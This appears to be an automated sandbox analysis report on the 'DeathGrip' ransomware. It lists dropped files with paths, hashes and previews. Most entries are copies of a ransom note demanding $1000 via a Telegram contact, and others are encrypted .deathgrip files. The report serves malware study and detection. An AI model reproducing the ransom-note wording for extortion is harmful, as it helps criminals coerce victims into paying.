                                                          Preview:DeathGrip Ransomware Attack | t.me/DeathGripRansomware....This computer is attacked by russian ransomware community of professional black hat hackers. ..Your every single documents / details is now under observation of those hackers...If you want to get it back then you have to pay 1000$ for it.....This Attack Is Done By Team RansomVerse You Can Find Us On Telegram.. @DeathGripRansomware Contact The Owner For The Decrypter Of This Ransomware....#DeathGripMalware..

                                                          C:\Users\Default\OneDrive\read_it.txt

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):470
                                                          Entropy (8bit):4.6966693482751545
                                                          Encrypted:false
                                                          SSDEEP:6:6mCdVIIFKIlLMBgaIsEbsrIuQT9VH3RIG6hoNr4g7F8JqNByldQ2WbvF7HeIgAHz:WKceUsrIpRIBhGcgBold0bvJMcKqLv
                                                          MD5:8D343BF17EF14ED4108D2DB0F866100A
                                                          SHA1:C40E7C3D21224852317C9FAA94FB9491798AFE64
                                                          SHA-256:FF6234D40F59879BFB8CBC051303E5C40B7FAAB945A8B867937146CF693032A3
                                                          SHA-512:5EF8D0A32C7B00393F9CCEC32EC5B65532C0CB15F7F03BD93920FE74D365A4805DA55B26BC0C6ED56B96A47A1C186A673147CB67539A6E907E82416B331E9303
                                                          Malicious:false
                                                          Preview:DeathGrip Ransomware Attack | t.me/DeathGripRansomware....This computer is attacked by russian ransomware community of professional black hat hackers. ..Your every single documents / details is now under observation of those hackers...If you want to get it back then you have to pay 1000$ for it.....This Attack Is Done By Team RansomVerse You Can Find Us On Telegram.. @DeathGripRansomware Contact The Owner For The Decrypter Of This Ransomware....#DeathGripMalware..

                                                          C:\Users\Public\AccountPictures\read_it.txt

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):470
                                                          Entropy (8bit):4.6966693482751545
                                                          Encrypted:false
                                                          SSDEEP:6:6mCdVIIFKIlLMBgaIsEbsrIuQT9VH3RIG6hoNr4g7F8JqNByldQ2WbvF7HeIgAHz:WKceUsrIpRIBhGcgBold0bvJMcKqLv
                                                          MD5:8D343BF17EF14ED4108D2DB0F866100A
                                                          SHA1:C40E7C3D21224852317C9FAA94FB9491798AFE64
                                                          SHA-256:FF6234D40F59879BFB8CBC051303E5C40B7FAAB945A8B867937146CF693032A3
                                                          SHA-512:5EF8D0A32C7B00393F9CCEC32EC5B65532C0CB15F7F03BD93920FE74D365A4805DA55B26BC0C6ED56B96A47A1C186A673147CB67539A6E907E82416B331E9303
                                                          Malicious:false
                                                          Preview:DeathGrip Ransomware Attack | t.me/DeathGripRansomware....This computer is attacked by russian ransomware community of professional black hat hackers. ..Your every single documents / details is now under observation of those hackers...If you want to get it back then you have to pay 1000$ for it.....This Attack Is Done By Team RansomVerse You Can Find Us On Telegram.. @DeathGripRansomware Contact The Owner For The Decrypter Of This Ransomware....#DeathGripMalware..

                                                          C:\Users\Public\Desktop\Adobe Acrobat.lnk

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?

                                                          C:\Users\Public\Desktop\Adobe Acrobat.lnk.deathgrip

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):2416
                                                          Entropy (8bit):7.872157710396021
                                                          Encrypted:false
                                                          SSDEEP:48:rS61Urh50fBBLxI67ahcFPDviMYM+WqJ4+F566PeBcD:r71UtOnLvVYFV
                                                          MD5:9738FD15C1DB5E19F08E05FEEA92B390
                                                          SHA1:9BE96F61AB4A8202B4C98503E74909A75F8C0C6C
                                                          SHA-256:40AE2950FB421EB06A43760A48ABB23A1FB4759E25C280147B42D52C8AAD0D5F
                                                          SHA-512:9340A8EF4687D370208F4800C0BA1757037E1825F0DB224A16C11F3A1D68486890688B2E34113CE87017FA53302A26E0256400F24BE53FC61F9A8F2D3A81EB69
                                                          Malicious:false
                                                          Preview:...........?P@E.N`_a\.....5..~}..W..o.~.0d...5Ny..GI.z\@x....ap.D."k......L........>oS.2c6..z}...XJ........./RI..Ik ..M.....7..w...Bz.4Vq.ms....\...F`\/Jc.kec.......&_.;..k.z..H...`*-..P.....6.s....8....)...E.Nu]...VK.%y#e$&...."..Q....F...z;..]...../..K.Bi.8...r.n...s..}(...w.'9.cO..m.....f...3..HD..v.....7..\......?a]......g..q..U..........y.........x.\.....%.$R.h..#.I..O8...*.c.....t.X.....u.hi..M.O........6.Ni#.O.U..3..2`.'..$X).M'AJ..xb'..n.d..l].6.C.~&.x.$5.,;..1R....".4....=..+..5(r...5..fk.OkF`c.FH.f......T.EG&.qu[.&.VC........l;.....4...AJ....6jZ.....V.DMW...x.l@.z..K..M~. .p.{.8)-(p.Z.|U7...V99I.?........Y.Z..\.`..0.7.&...A.].].>(&+..61..m.+..8..%.....p...S.I...D:3.........t'X.u..6.=d8.....:i.,.......2..x?.....P-@!.^t...I[..^GG....#....Z\iL........F..g..$..1m..%............!..d..m...EG...?g..p%.>+G.t.9).T.pS..=...&..W.{..........*....#/W...:9..zz.1.`h$..9+r....g..........#JE...!.Z....&q...e.L...H...&.C.."..........+,GP~)....ey.+.

                                                          C:\Users\Public\Desktop\Firefox.lnk

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?

                                                          C:\Users\Public\Desktop\Firefox.lnk.deathgrip

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1360
                                                          Entropy (8bit):7.748761826854886
                                                          Encrypted:false
                                                          SSDEEP:24:kggcQMdoByck7WhRSLROY6HCM+2GdBK4K1/5auDJihnJShEPMQuAhJwM+Q46UodR:McDyK7WSLcY+CUEKJihn7MQuAYMZ4IdR
                                                          MD5:79EDC3C53127F7F1903352A8BE387585
                                                          SHA1:5293A99443C248BA0EF41AF19715355B086C7408
                                                          SHA-256:381B9D351533914972B4005278F94A9C5B5F372215C1B8BB1BFF568AA9946F8E
                                                          SHA-512:65D1DF72A85C526D23BE19E7B427C451C13AD3489A65E90B879D3969CC9C1E9CE64A2452ADC66669F239CC3711D522C178E753AD19AD07B8D07E28E667DF43E9
                                                          Malicious:false
                                                          Preview:........E.....jkI~Xg9.................x...By.a...^^..2.!.&.7\..W.l.!u].i[.+/r.&G...!z.]....%q..`...U>.U.i..%..*a'.F.....].$./.Sy.0..m2...6-..ZkAA..!....I.V f.D....^..]z.~|.m.,.=^..R.*4.e'.......L..! ./..O.%....K...'.5...s.. .....fsTDw...>..[.....t4.2..#.....o=..^...x5.3..&...l ..OF.F..r........J...I.."..:..H.G@U....i.G.`.........d.h...zYJ6.]....^.j.y..A.#...j..^.x.K~.....;...6..E.s_V..joM.}..V....p..\..~..6.!X/D.;..b=.~.W......}....."5..........\..VWpvJ.....8.........I).............p.....GJ....~..T..{......W... .0...p;.OY.T......F8k4.R..l.. L.d.p.p...p....B.l.....8"N{....t=.._P..w.}.b.............$......>..U~.M!FL....w#^..[..s;...U..0............\....eFl..0.R..._/.f..=.x.f......iBf...+U..g.v.fC.}...L..f..G..7.P.1.9...9.Y..jT:<..Qn..H.rYjF.".....I-.>..Z.8<...5k{W.{....'..$.]..........P.]0.j..y.Y#.BU.!....0=.M.....k...-].......\..u.o..y.UF.....}1....uQ/..;...C."qiY.r.....7.......p{ ...lJ3.V..........!.8.K.`..[...k.3<..P..M..\i.7"%.e..U

                                                          C:\Users\Public\read_it.txt

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):470
                                                          Entropy (8bit):4.6966693482751545
                                                          Encrypted:false
                                                          SSDEEP:6:6mCdVIIFKIlLMBgaIsEbsrIuQT9VH3RIG6hoNr4g7F8JqNByldQ2WbvF7HeIgAHz:WKceUsrIpRIBhGcgBold0bvJMcKqLv
                                                          MD5:8D343BF17EF14ED4108D2DB0F866100A
                                                          SHA1:C40E7C3D21224852317C9FAA94FB9491798AFE64
                                                          SHA-256:FF6234D40F59879BFB8CBC051303E5C40B7FAAB945A8B867937146CF693032A3
                                                          SHA-512:5EF8D0A32C7B00393F9CCEC32EC5B65532C0CB15F7F03BD93920FE74D365A4805DA55B26BC0C6ED56B96A47A1C186A673147CB67539A6E907E82416B331E9303
                                                          Malicious:false
                                                          Preview:DeathGrip Ransomware Attack | t.me/DeathGripRansomware....This computer is attacked by russian ransomware community of professional black hat hackers. ..Your every single documents / details is now under observation of those hackers...If you want to get it back then you have to pay 1000$ for it.....This Attack Is Done By Team RansomVerse You Can Find Us On Telegram.. @DeathGripRansomware Contact The Owner For The Decrypter Of This Ransomware....#DeathGripMalware..

                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\gl\read_it.txt

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):470
                                                          Entropy (8bit):4.6966693482751545
                                                          Encrypted:false
                                                          SSDEEP:6:6mCdVIIFKIlLMBgaIsEbsrIuQT9VH3RIG6hoNr4g7F8JqNByldQ2WbvF7HeIgAHz:WKceUsrIpRIBhGcgBold0bvJMcKqLv
                                                          MD5:8D343BF17EF14ED4108D2DB0F866100A
                                                          SHA1:C40E7C3D21224852317C9FAA94FB9491798AFE64
                                                          SHA-256:FF6234D40F59879BFB8CBC051303E5C40B7FAAB945A8B867937146CF693032A3
                                                          SHA-512:5EF8D0A32C7B00393F9CCEC32EC5B65532C0CB15F7F03BD93920FE74D365A4805DA55B26BC0C6ED56B96A47A1C186A673147CB67539A6E907E82416B331E9303
                                                          Malicious:true
                                                          Preview:DeathGrip Ransomware Attack | t.me/DeathGripRansomware....This computer is attacked by russian ransomware community of professional black hat hackers. ..Your every single documents / details is now under observation of those hackers...If you want to get it back then you have to pay 1000$ for it.....This Attack Is Done By Team RansomVerse You Can Find Us On Telegram.. @DeathGripRansomware Contact The Owner For The Decrypter Of This Ransomware....#DeathGripMalware..

                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\gu\read_it.txt

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):470
                                                          Entropy (8bit):4.6966693482751545
                                                          Encrypted:false
                                                          SSDEEP:6:6mCdVIIFKIlLMBgaIsEbsrIuQT9VH3RIG6hoNr4g7F8JqNByldQ2WbvF7HeIgAHz:WKceUsrIpRIBhGcgBold0bvJMcKqLv
                                                          MD5:8D343BF17EF14ED4108D2DB0F866100A
                                                          SHA1:C40E7C3D21224852317C9FAA94FB9491798AFE64
                                                          SHA-256:FF6234D40F59879BFB8CBC051303E5C40B7FAAB945A8B867937146CF693032A3
                                                          SHA-512:5EF8D0A32C7B00393F9CCEC32EC5B65532C0CB15F7F03BD93920FE74D365A4805DA55B26BC0C6ED56B96A47A1C186A673147CB67539A6E907E82416B331E9303
                                                          Malicious:false
                                                          Preview:DeathGrip Ransomware Attack | t.me/DeathGripRansomware....This computer is attacked by russian ransomware community of professional black hat hackers. ..Your every single documents / details is now under observation of those hackers...If you want to get it back then you have to pay 1000$ for it.....This Attack Is Done By Team RansomVerse You Can Find Us On Telegram.. @DeathGripRansomware Contact The Owner For The Decrypter Of This Ransomware....#DeathGripMalware..

                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\hi\read_it.txt

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):470
                                                          Entropy (8bit):4.6966693482751545
                                                          Encrypted:false
                                                          SSDEEP:6:6mCdVIIFKIlLMBgaIsEbsrIuQT9VH3RIG6hoNr4g7F8JqNByldQ2WbvF7HeIgAHz:WKceUsrIpRIBhGcgBold0bvJMcKqLv
                                                          MD5:8D343BF17EF14ED4108D2DB0F866100A
                                                          SHA1:C40E7C3D21224852317C9FAA94FB9491798AFE64
                                                          SHA-256:FF6234D40F59879BFB8CBC051303E5C40B7FAAB945A8B867937146CF693032A3
                                                          SHA-512:5EF8D0A32C7B00393F9CCEC32EC5B65532C0CB15F7F03BD93920FE74D365A4805DA55B26BC0C6ED56B96A47A1C186A673147CB67539A6E907E82416B331E9303
                                                          Malicious:false
                                                          Preview:DeathGrip Ransomware Attack | t.me/DeathGripRansomware....This computer is attacked by russian ransomware community of professional black hat hackers. ..Your every single documents / details is now under observation of those hackers...If you want to get it back then you have to pay 1000$ for it.....This Attack Is Done By Team RansomVerse You Can Find Us On Telegram.. @DeathGripRansomware Contact The Owner For The Decrypter Of This Ransomware....#DeathGripMalware..

                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\hr\read_it.txt

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):470
                                                          Entropy (8bit):4.6966693482751545
                                                          Encrypted:false
                                                          SSDEEP:6:6mCdVIIFKIlLMBgaIsEbsrIuQT9VH3RIG6hoNr4g7F8JqNByldQ2WbvF7HeIgAHz:WKceUsrIpRIBhGcgBold0bvJMcKqLv
                                                          MD5:8D343BF17EF14ED4108D2DB0F866100A
                                                          SHA1:C40E7C3D21224852317C9FAA94FB9491798AFE64
                                                          SHA-256:FF6234D40F59879BFB8CBC051303E5C40B7FAAB945A8B867937146CF693032A3
                                                          SHA-512:5EF8D0A32C7B00393F9CCEC32EC5B65532C0CB15F7F03BD93920FE74D365A4805DA55B26BC0C6ED56B96A47A1C186A673147CB67539A6E907E82416B331E9303
                                                          Malicious:false
                                                          Preview:DeathGrip Ransomware Attack | t.me/DeathGripRansomware....This computer is attacked by russian ransomware community of professional black hat hackers. ..Your every single documents / details is now under observation of those hackers...If you want to get it back then you have to pay 1000$ for it.....This Attack Is Done By Team RansomVerse You Can Find Us On Telegram.. @DeathGripRansomware Contact The Owner For The Decrypter Of This Ransomware....#DeathGripMalware..

                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\hu\read_it.txt

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):470
                                                          Entropy (8bit):4.6966693482751545
                                                          Encrypted:false
                                                          SSDEEP:6:6mCdVIIFKIlLMBgaIsEbsrIuQT9VH3RIG6hoNr4g7F8JqNByldQ2WbvF7HeIgAHz:WKceUsrIpRIBhGcgBold0bvJMcKqLv
                                                          MD5:8D343BF17EF14ED4108D2DB0F866100A
                                                          SHA1:C40E7C3D21224852317C9FAA94FB9491798AFE64
                                                          SHA-256:FF6234D40F59879BFB8CBC051303E5C40B7FAAB945A8B867937146CF693032A3
                                                          SHA-512:5EF8D0A32C7B00393F9CCEC32EC5B65532C0CB15F7F03BD93920FE74D365A4805DA55B26BC0C6ED56B96A47A1C186A673147CB67539A6E907E82416B331E9303
                                                          Malicious:false
                                                          Preview:DeathGrip Ransomware Attack | t.me/DeathGripRansomware....This computer is attacked by russian ransomware community of professional black hat hackers. ..Your every single documents / details is now under observation of those hackers...If you want to get it back then you have to pay 1000$ for it.....This Attack Is Done By Team RansomVerse You Can Find Us On Telegram.. @DeathGripRansomware Contact The Owner For The Decrypter Of This Ransomware....#DeathGripMalware..

                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\hy\read_it.txt

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):470
                                                          Entropy (8bit):4.6966693482751545
                                                          Encrypted:false
                                                          SSDEEP:6:6mCdVIIFKIlLMBgaIsEbsrIuQT9VH3RIG6hoNr4g7F8JqNByldQ2WbvF7HeIgAHz:WKceUsrIpRIBhGcgBold0bvJMcKqLv
                                                          MD5:8D343BF17EF14ED4108D2DB0F866100A
                                                          SHA1:C40E7C3D21224852317C9FAA94FB9491798AFE64
                                                          SHA-256:FF6234D40F59879BFB8CBC051303E5C40B7FAAB945A8B867937146CF693032A3
                                                          SHA-512:5EF8D0A32C7B00393F9CCEC32EC5B65532C0CB15F7F03BD93920FE74D365A4805DA55B26BC0C6ED56B96A47A1C186A673147CB67539A6E907E82416B331E9303
                                                          Malicious:false
                                                          Preview:DeathGrip Ransomware Attack | t.me/DeathGripRansomware....This computer is attacked by russian ransomware community of professional black hat hackers. ..Your every single documents / details is now under observation of those hackers...If you want to get it back then you have to pay 1000$ for it.....This Attack Is Done By Team RansomVerse You Can Find Us On Telegram.. @DeathGripRansomware Contact The Owner For The Decrypter Of This Ransomware....#DeathGripMalware..

                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\id\read_it.txt

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):470
                                                          Entropy (8bit):4.6966693482751545
                                                          Encrypted:false
                                                          SSDEEP:6:6mCdVIIFKIlLMBgaIsEbsrIuQT9VH3RIG6hoNr4g7F8JqNByldQ2WbvF7HeIgAHz:WKceUsrIpRIBhGcgBold0bvJMcKqLv
                                                          MD5:8D343BF17EF14ED4108D2DB0F866100A
                                                          SHA1:C40E7C3D21224852317C9FAA94FB9491798AFE64
                                                          SHA-256:FF6234D40F59879BFB8CBC051303E5C40B7FAAB945A8B867937146CF693032A3
                                                          SHA-512:5EF8D0A32C7B00393F9CCEC32EC5B65532C0CB15F7F03BD93920FE74D365A4805DA55B26BC0C6ED56B96A47A1C186A673147CB67539A6E907E82416B331E9303
                                                          Malicious:false
                                                          Preview:DeathGrip Ransomware Attack | t.me/DeathGripRansomware....This computer is attacked by russian ransomware community of professional black hat hackers. ..Your every single documents / details is now under observation of those hackers...If you want to get it back then you have to pay 1000$ for it.....This Attack Is Done By Team RansomVerse You Can Find Us On Telegram.. @DeathGripRansomware Contact The Owner For The Decrypter Of This Ransomware....#DeathGripMalware..

                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\is\read_it.txt

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):470
                                                          Entropy (8bit):4.6966693482751545
                                                          Encrypted:false
                                                          SSDEEP:6:6mCdVIIFKIlLMBgaIsEbsrIuQT9VH3RIG6hoNr4g7F8JqNByldQ2WbvF7HeIgAHz:WKceUsrIpRIBhGcgBold0bvJMcKqLv
                                                          MD5:8D343BF17EF14ED4108D2DB0F866100A
                                                          SHA1:C40E7C3D21224852317C9FAA94FB9491798AFE64
                                                          SHA-256:FF6234D40F59879BFB8CBC051303E5C40B7FAAB945A8B867937146CF693032A3
                                                          SHA-512:5EF8D0A32C7B00393F9CCEC32EC5B65532C0CB15F7F03BD93920FE74D365A4805DA55B26BC0C6ED56B96A47A1C186A673147CB67539A6E907E82416B331E9303
                                                          Malicious:false
                                                          Preview:DeathGrip Ransomware Attack | t.me/DeathGripRansomware....This computer is attacked by russian ransomware community of professional black hat hackers. ..Your every single documents / details is now under observation of those hackers...If you want to get it back then you have to pay 1000$ for it.....This Attack Is Done By Team RansomVerse You Can Find Us On Telegram.. @DeathGripRansomware Contact The Owner For The Decrypter Of This Ransomware....#DeathGripMalware..

                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\it\read_it.txt

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):470
                                                          Entropy (8bit):4.6966693482751545
                                                          Encrypted:false
                                                          SSDEEP:6:6mCdVIIFKIlLMBgaIsEbsrIuQT9VH3RIG6hoNr4g7F8JqNByldQ2WbvF7HeIgAHz:WKceUsrIpRIBhGcgBold0bvJMcKqLv
                                                          MD5:8D343BF17EF14ED4108D2DB0F866100A
                                                          SHA1:C40E7C3D21224852317C9FAA94FB9491798AFE64
                                                          SHA-256:FF6234D40F59879BFB8CBC051303E5C40B7FAAB945A8B867937146CF693032A3
                                                          SHA-512:5EF8D0A32C7B00393F9CCEC32EC5B65532C0CB15F7F03BD93920FE74D365A4805DA55B26BC0C6ED56B96A47A1C186A673147CB67539A6E907E82416B331E9303
                                                          Malicious:false
                                                          Preview:DeathGrip Ransomware Attack | t.me/DeathGripRansomware....This computer is attacked by russian ransomware community of professional black hat hackers. ..Your every single documents / details is now under observation of those hackers...If you want to get it back then you have to pay 1000$ for it.....This Attack Is Done By Team RansomVerse You Can Find Us On Telegram.. @DeathGripRansomware Contact The Owner For The Decrypter Of This Ransomware....#DeathGripMalware..

                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\iw\read_it.txt

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):470
                                                          Entropy (8bit):4.6966693482751545
                                                          Encrypted:false
                                                          SSDEEP:6:6mCdVIIFKIlLMBgaIsEbsrIuQT9VH3RIG6hoNr4g7F8JqNByldQ2WbvF7HeIgAHz:WKceUsrIpRIBhGcgBold0bvJMcKqLv
                                                          MD5:8D343BF17EF14ED4108D2DB0F866100A
                                                          SHA1:C40E7C3D21224852317C9FAA94FB9491798AFE64
                                                          SHA-256:FF6234D40F59879BFB8CBC051303E5C40B7FAAB945A8B867937146CF693032A3
                                                          SHA-512:5EF8D0A32C7B00393F9CCEC32EC5B65532C0CB15F7F03BD93920FE74D365A4805DA55B26BC0C6ED56B96A47A1C186A673147CB67539A6E907E82416B331E9303
                                                          Malicious:false
                                                          Preview:DeathGrip Ransomware Attack | t.me/DeathGripRansomware....This computer is attacked by russian ransomware community of professional black hat hackers. ..Your every single documents / details is now under observation of those hackers...If you want to get it back then you have to pay 1000$ for it.....This Attack Is Done By Team RansomVerse You Can Find Us On Telegram.. @DeathGripRansomware Contact The Owner For The Decrypter Of This Ransomware....#DeathGripMalware..

                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\ja\read_it.txt

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):470
                                                          Entropy (8bit):4.6966693482751545
                                                          Encrypted:false
                                                          SSDEEP:6:6mCdVIIFKIlLMBgaIsEbsrIuQT9VH3RIG6hoNr4g7F8JqNByldQ2WbvF7HeIgAHz:WKceUsrIpRIBhGcgBold0bvJMcKqLv
                                                          MD5:8D343BF17EF14ED4108D2DB0F866100A
                                                          SHA1:C40E7C3D21224852317C9FAA94FB9491798AFE64
                                                          SHA-256:FF6234D40F59879BFB8CBC051303E5C40B7FAAB945A8B867937146CF693032A3
                                                          SHA-512:5EF8D0A32C7B00393F9CCEC32EC5B65532C0CB15F7F03BD93920FE74D365A4805DA55B26BC0C6ED56B96A47A1C186A673147CB67539A6E907E82416B331E9303
                                                          Malicious:false
                                                          Preview:DeathGrip Ransomware Attack | t.me/DeathGripRansomware....This computer is attacked by russian ransomware community of professional black hat hackers. ..Your every single documents / details is now under observation of those hackers...If you want to get it back then you have to pay 1000$ for it.....This Attack Is Done By Team RansomVerse You Can Find Us On Telegram.. @DeathGripRansomware Contact The Owner For The Decrypter Of This Ransomware....#DeathGripMalware..

                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\ka\read_it.txt

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):470
                                                          Entropy (8bit):4.6966693482751545
                                                          Encrypted:false
                                                          SSDEEP:6:6mCdVIIFKIlLMBgaIsEbsrIuQT9VH3RIG6hoNr4g7F8JqNByldQ2WbvF7HeIgAHz:WKceUsrIpRIBhGcgBold0bvJMcKqLv
                                                          MD5:8D343BF17EF14ED4108D2DB0F866100A
                                                          SHA1:C40E7C3D21224852317C9FAA94FB9491798AFE64
                                                          SHA-256:FF6234D40F59879BFB8CBC051303E5C40B7FAAB945A8B867937146CF693032A3
                                                          SHA-512:5EF8D0A32C7B00393F9CCEC32EC5B65532C0CB15F7F03BD93920FE74D365A4805DA55B26BC0C6ED56B96A47A1C186A673147CB67539A6E907E82416B331E9303
                                                          Malicious:false
                                                          Preview:DeathGrip Ransomware Attack | t.me/DeathGripRansomware....This computer is attacked by russian ransomware community of professional black hat hackers. ..Your every single documents / details is now under observation of those hackers...If you want to get it back then you have to pay 1000$ for it.....This Attack Is Done By Team RansomVerse You Can Find Us On Telegram.. @DeathGripRansomware Contact The Owner For The Decrypter Of This Ransomware....#DeathGripMalware..

                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\kk\read_it.txt

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):470
                                                          Entropy (8bit):4.6966693482751545
                                                          Encrypted:false
                                                          SSDEEP:6:6mCdVIIFKIlLMBgaIsEbsrIuQT9VH3RIG6hoNr4g7F8JqNByldQ2WbvF7HeIgAHz:WKceUsrIpRIBhGcgBold0bvJMcKqLv
                                                          MD5:8D343BF17EF14ED4108D2DB0F866100A
                                                          SHA1:C40E7C3D21224852317C9FAA94FB9491798AFE64
                                                          SHA-256:FF6234D40F59879BFB8CBC051303E5C40B7FAAB945A8B867937146CF693032A3
                                                          SHA-512:5EF8D0A32C7B00393F9CCEC32EC5B65532C0CB15F7F03BD93920FE74D365A4805DA55B26BC0C6ED56B96A47A1C186A673147CB67539A6E907E82416B331E9303
                                                          Malicious:false
                                                          Preview:DeathGrip Ransomware Attack | t.me/DeathGripRansomware....This computer is attacked by russian ransomware community of professional black hat hackers. ..Your every single documents / details is now under observation of those hackers...If you want to get it back then you have to pay 1000$ for it.....This Attack Is Done By Team RansomVerse You Can Find Us On Telegram.. @DeathGripRansomware Contact The Owner For The Decrypter Of This Ransomware....#DeathGripMalware..

                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\km\read_it.txt

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):470
                                                          Entropy (8bit):4.6966693482751545
                                                          Encrypted:false
                                                          SSDEEP:6:6mCdVIIFKIlLMBgaIsEbsrIuQT9VH3RIG6hoNr4g7F8JqNByldQ2WbvF7HeIgAHz:WKceUsrIpRIBhGcgBold0bvJMcKqLv
                                                          MD5:8D343BF17EF14ED4108D2DB0F866100A
                                                          SHA1:C40E7C3D21224852317C9FAA94FB9491798AFE64
                                                          SHA-256:FF6234D40F59879BFB8CBC051303E5C40B7FAAB945A8B867937146CF693032A3
